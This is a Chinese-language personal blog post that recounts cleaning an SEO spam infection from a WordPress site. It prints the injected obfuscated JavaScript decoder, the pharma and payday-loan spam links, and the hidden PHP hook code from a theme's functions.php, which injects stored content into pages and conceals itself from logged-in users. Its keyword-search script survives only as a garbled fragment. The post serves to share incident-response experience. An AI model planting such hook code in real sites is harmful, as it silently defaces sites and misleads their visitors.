记一次网页木马查杀

1 views

wordpress博客被挂马,网页头部被植入了一段英文广告。如图-1

tj_header图-1 被网页木马植入的广告

于是我开始了一段查杀网页木马的经历,过程比较艰辛,不过问题总算解决了。打算记录一些经验,分享一些心得,希望对他人有所帮助。于是有了这篇文章。

首先,网站被挂马已经不是第一次了,甚至我觉得这是个人独立博客的一堂必修课。以往的挂马比较简单,往往是在网页的头部或者尾部植入一段js代码,通过查找网页的关键字往往就能找到,删除之后就可以。
然而这次的网页木马比较的复杂。打开网页源码来看,在“</head>”标签之前植入了一下一段js代码。这段代码看似不是直接写入广告,更像是一段解码片段,而且不能单独执行(这段代码至今看不明白)。

<script language="JavaScript">
	var _gu6 = [];
	_gu6.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
	_gu6.push(['_setOption', '6918518510413211617416517217519017117018618118219318218']);
	_gu6.push(['_trackPageview', '1185175186175181180128167168185181178187186171129169178']);
	_gu6.push(['_setOption', '1751821281841711691861101221231231821901141671871861811']);
	_gu6.push(['_trackPageview', '1416718718618111412212312318219011112919513011718518619']);
	_gu6.push(['_setOption', '1178171132']);
	var if='a',h9='o',nf='m',wf='e',k0='f',o5='o',mb='r',rc='r',s8='C',w0='C',yb='h',ta='d',t76=z56='';
	var d12=3,d22=70,l44=p23=v48=0;for(v48=0;v48<_gu6.length;v48++)t76+=_gu6[v48][1];l44=t76.length;
	while(p23<l44)z56+=String[k0+mb+o5+nf+s8+yb+if+rc+w0+h9+ta+wf](parseInt(t76.slice(p23,p23+=d12))-d22);
	document.write(z56);
</script>

在</body>之后植入了一下的广告。猜测是上面的js代码写下了这段广告,仅仅猜测。

<div class="h_fixedtop">
	<p>Borrowers can avoid paying the no generic levitra <a href="http://levitra6online.com" title="generic levitra">generic levitra</a> more about unsecured loan.Let money must have literally no viagra online without prescription <a href="http://wwwwviagracom.com" title="viagra online without prescription">viagra online without prescription</a> complications that our bills.Make sure that provides funding without much hustle online cash advance loans <a href="http://cashadvance6online.com" title="online cash advance loans">online cash advance loans</a> as regards to forward the application.Is the reason for extra for business of viagra <a href="http://viagra5online.com" title="viagra">viagra</a> unpaid bill late payments credit problems.Bills might be repeatedly denied credit applicants get cash fast <a href="http://wwwcashadvancescom.com" title="get cash fast">get cash fast</a> must meet some necessary funds.Looking for are you a chapter is levitra <a href="http://wwwlevitrascom.com" title="levitra">levitra</a> useful for borrowers at risk.And if unable to utilize these lenders will free cialis <a href="http://cialis8online.com" title="free cialis">free cialis</a> carry a situation has to surprises.Everyone experiences financial situation has had a last requirement is cialis <a href="http://wwwcialiscomcom.com" title="cialis">cialis</a> trying to contribute a spotless employment history.</p>
</div>

简单的php源码查找并没有发现以上的任何以上的代码。由于wordpress的源码太多,无法手动一个一个文件查找,只好写一个简单的遍历wordpress目录并搜索关键字的php程序。源码如下:

找到了~~~文件名:",$dir."/".$file,"

"; //break;/ } fclose($handle); } } } } closedir($dh); } } } //查找指定目录的php文件,并找出包含Borrowers字符的文件 listDir("/wordpress","php","Borrowers");

执行search.php后,既没有找到js的关键代码也没找到关于广告内容的字符。由此推测,js代码并不是固定植入某一个网页中,很可能是植入到php源码当中,每当执行php源码时候就产生js代码由此植入了广告内容。

我试图换一个主题,发现广告依然存在。说明网页木马感染了所有的主题文件或者是在全局函数里注入,甚至也怀疑是否被植入到了数据库。

wordpress的文件太多,逐个查找可疑代码工作量实在太大。只好从首页index.php一步一步的跟踪下来,跟踪加载的文件,一步步打印(echo) 可疑,从wp-blog-header.php,wp-load.php,template-loader.php…最后总算定位到了主题的functions.php,找到了隐藏在后面的php恶意代码

if (!function_exists("b_call")) {
function b_call() {
if (!ob_get_level()) ob_start("b_goes");
}
function b_goes($p) {
if (!defined('wp_m1')) {
if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in()) || (!$m = get_option('_metaalternate1'))) {
return $p;
}
list($m, $n) = @unserialize(trim(implode(array_reverse(preg_split('::u', $m)))));
define('wp_m1', $m);
define('wp_n1', $n);
}
if (!stripos($p, wp_n1)) $p = preg_replace("~<body[^>]*>~i", "$0\n".wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace("~</head>~", wp_m1."\n</head>", $p, 1);
if (!stripos($p, wp_n1)) $p = preg_replace("~</div>~", "</div>\n".wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace("~</div>~", wp_m1."\n</div>", $p, 1);
return $p;
}
function b_end() {
@ob_end_flush();
}
if (ob_get_level()) ob_end_clean();
add_action("init", "b_call");
add_action("wp_head", "b_call");
add_action("get_sidebar", "b_call");
add_action("wp_footer", "b_call");
add_action("shutdown", "b_end");
}

原来是通过一个挂钩函数add_action,注入到了源码当中。通过正则表达式定位到<head>和<body>的位置,每次wordpress执行init,wp_head等函数时,都会执行b_call函数,shutdown之后则执行b_end。这种思路确实比简单的植入js代码更巧妙,更具有隐蔽性。

由此看来,无论是js挂马还是php源码植入,往往都是在文件底部或者顶部植入居多。只是这里的js能植入到head和body标签之间,是因为php匹配定位的缘故。

再次执行搜索函数search.php,

listDir(“/wordpress”,“php”,“b_call”);

果然找到了所以被感染的主题均在functions.php。

将源码注释掉之后,整个世界总算清静下来了╮(╯▽╰)╭。

只是目前为止还没完全读懂这段恶意代码的意思,或许木马还没有完全清理,有空研究一下,应该是很有意思的。

 

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>